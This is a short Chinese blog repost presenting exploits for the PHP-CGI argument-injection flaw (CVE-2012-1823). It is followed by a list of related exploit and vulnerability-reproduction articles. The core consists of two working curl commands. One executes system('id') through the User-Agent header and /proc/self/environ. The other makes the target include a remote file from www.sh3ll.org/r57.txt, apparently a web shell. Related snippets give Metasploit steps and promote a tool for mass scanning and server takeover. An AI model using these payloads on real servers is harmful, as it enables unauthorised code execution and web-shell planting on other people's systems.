php-cgi漏洞利用EXP

最新推荐文章于 2024-10-21 16:49:08 发布

转载最新推荐文章于 2024-10-21 16:49:08 发布 · 234 阅读

0 ·

CC 4.0 BY-SA版权

原文链接：http://www.cnblogs.com/shanmao/archive/2013/01/19/2867470.html

文章标签：

#php

本文介绍了使用curl工具通过本地和远程包含的方式执行PHP代码的两种技巧。第一种技巧是直接执行本地代码，第二种技巧是通过允许URL包含来执行远程代码。这些方法对于理解PHP的代码执行流程和安全性有重要价值。

转自： http://acmfly.blog.163.com/blog/static/184049084201242001024914/

1、本地包含直接执行代码:

curl -H "USER-AGENT: <?system('id');die();?>" http://target.com/test.php?-dauto_prepend_file%3d/proc/self/environ+-n

2、远程包含执行代码:

curl http://target.com/test.php?-dallow_url_include%3don+-dauto_prepend_file%3dhttp://www.sh3ll.org/r57.txt

转载于:https://www.cnblogs.com/shanmao/archive/2013/01/19/2867470.html

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

dgitra7963

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

PHP-CGI Windows平台远程代码执行漏洞复现(CVE-2024-4577)

0xSec

06-08

4117

2024年6月，PHP官方发布新版本，修复了PHP-CGI中一个远程代码执行漏洞。鉴于该漏洞无前置条件，易于利用，且默认情况下可获取操作系统权限，建议所有使用受影响版本的企业尽快升级修复，以确保安全。

PHP-CGI Windows平台远程代码执行漏洞(CVE-2024-4577)

李同學的安全圈

06-11

3001

PHP 在设计时忽略 Windows 中对字符转换的Best-Fit 特性，当 PHP-CGI 运行在Window平台且使用了如下语系（简体中文936/繁体中文950/日文932等）时，攻击者可构造恶意请求绕过 CVE-2012-1823 补丁，从而可在无需登陆的情况下执行任意PHP代码。

参与评论您还未登录，请先登录后发表或查看评论

php cgi漏洞利用工具源代码

01-22

cgi mod(cve-2012-1823)最新漏洞，可以批量扫描多网段漏洞，多加利用，可以获取服务器控制权限。

PHP CGI漏洞利用实验

weixin_51646864的博客

08-14

524

本地：linux2020.3 靶机：Metasploitable2-Linux 内网试验。 nmap扫描获取靶机ip：192.168.0.16 步骤： 1、启动msf，输入指令搜索该漏洞：search cve:2012-1823 2、使用use进入模块：use exploit/multi/http/php_cgi_arg_injection 3、查看需要配置的参数：show options 4、配置目标主机ip即可：set RHOSTS 192.168.0.16 5、进行攻击：exploit 下图攻

PHP CGI Windows平台远程代码执行漏洞(CVE-2024-4577)复现

fly夏天的博客

06-14

2155

PHP CGI Windows平台远程代码执行漏洞(CVE-2024-4577)复现

漏洞预警丨XAMPP在PHP-CGI模式下远程代码执行漏洞(CVE-2024-4577)

C20220511的博客

06-12

1357

PHP是一种被广泛应用的开放源代码的多用途脚本语言，PHP-CGI是PHP自带的FastCGI管理器。是一个实现了CGI协议的程序，用来解释PHP脚本的程序，2024年6 月7日，推特安全上orange公开了其漏洞细节，并且PHP官方已修复该漏洞。该漏洞仅适用于php版本为8.1 < 8.1.29，PHP 8.2 < 8.2.20，PHP 8.3 < 8.3.8，同时在php-cgi模式下运行php，并且运行在windows平台，且使用语系为繁体中文950、日文932、简体中文936等。

Fastcgi协议分析 && PHP-FPM未授权访问漏洞 && Exp编写

qq_64395221的博客

06-24

1158

Fastcgi协议由多个record组成，record也有header和body一说，服务器中间件将这二者按照fastcgi的规则封装好发送给语言后端，语言后端解码以后拿到具体数据，进行指定操作，并将结果再按照该协议封装好后返回给服务器中间件。HTTP协议是浏览器和服务器中间件进行数据交换的协议，浏览器将HTTP头和HTTP体用某个规则组装成数据包，以TCP的方式发送到服务器中间件，服务器中间件按照规则将数据包解码，并按要求拿到用户需要的数据，再以HTTP协议的规则打包返回给服务器。为4的record？

精选资源

webcgi-exploits:多语言Web CGI界面漏洞利用

05-13

Web CGI漏洞利用这是与不同的Web CGI相关的几种漏洞利用。我在过去几年中写过这些漏洞。这个怎么运作 Web应用程序基本上就是这些层：应用领域网络框架脚本语言引擎 Web容器（服务器）网络前端代理（nginx...

Web CGI漏洞利用技术解析与实例

这说明了该资源与CGI漏洞利用、脚本语言尤其是PHP相关的问题和工具紧密相关。压缩包文件名称列表为"webcgi-exploits-master"，这表明压缩包内可能包含了多种针对CGI漏洞利用的工具和相关文档，以及可能的利用案例...

CAS_EXP：CAS硬编码远程代码执行漏洞

02-13

CAS硬编码远程代码执行突破使用方式 java -jar cas-0.0.1-all.jar ----------------------- cas检测工具------------------------ --------- -----------本软件临时学习交流，如作他用所承受的法律责任一概与作者无关--------- ---------使用：jar -jar cas-0.0.1-all.jar ---由maobugs创建-------------------------------- 执行命令whoami ... 有效载荷是：AAAAIgAAABBrUgLwoiwOSTCDnal67lrrAAAABmFlczEyOG2E5KGXIUeDS4otbEU6mQufQIcYPEwC AzL9uqiZr4dOaap91C0EktTooeh7aMerjfA + HcOoYp6

2013phpweb漏洞利用EXP

03-28

2013phpweb漏洞利用EXP

【漏洞复现】PHP CGI Windows平台远程代码执行漏洞(CVE-2024-4577)

最新发布

m0_46381222的博客

10-21

1063

【漏洞复现】PHP CGI Windows平台远程代码执行漏洞(CVE-2024-4577)

【漏洞复现】PHP-CGI——Best-Fit——代码执行（CVE-2024-4577）

LongL_GuYu的博客

07-12

1242

PHP-CGI 是一种用于在 Web 服务器上运行 PHP 脚本的接口，通过 CGI（公共网关接口）将 PHP 解释器与 Web 服务器连接。PHP 在设计时忽略 Windows 中对字符转换的`Best-Fit`特性，当 PHP-CGI 运行在Window平台且使用了如下语系（简体中文936/繁体中文950/日文932等）时，攻击者可构造恶意请求绕过 CVE-2012-1823 补丁，从而可在无需登陆的情况下执行任意PHP代码。

MvMmallv5.5SQL注入之php的exp利用讲解

tonghua6的专栏

04-05

974

漏洞类型：MvMmall v5.5.1SQL注入漏洞默认后台:admincp.php?module=index 谷歌搜索:”Powered by MvMmall v5.5.1″ 一、利用方式：php exp利用 1 安装php环境使用phpnow很简单就能安装了。 2 利用exp攻击链接: http://pan.baidu.com/s/1eQgr9FO 提取密码:

PHP反序列化漏洞之CGI远程代码执行漏洞

LCW991207的博客

08-17

787

CVE-2012-1823就是php-cgi这个sapi出现的漏洞，本漏洞只出现在以cgi模式运行的php中。

Iis7.0 cgi解析漏洞复现

孤的博客

09-30

683

漏洞形成原因：漏洞与PHP配置有关，php.ini中的参数cgi.fix_pathinfo参数配置错误导致解析漏洞，开启了cgi.fix_pathinfo php.ini里默认cgi.fix_pathinfo=1，对其进行访问的时候，在URL路径后添加.php后缀名会当做php文件进行解析，漏洞由此产生是在 IIS7.5+php5.3+FastCGI 下的测试情况漏洞条件 php.ini里...

CGI漏洞攻击手册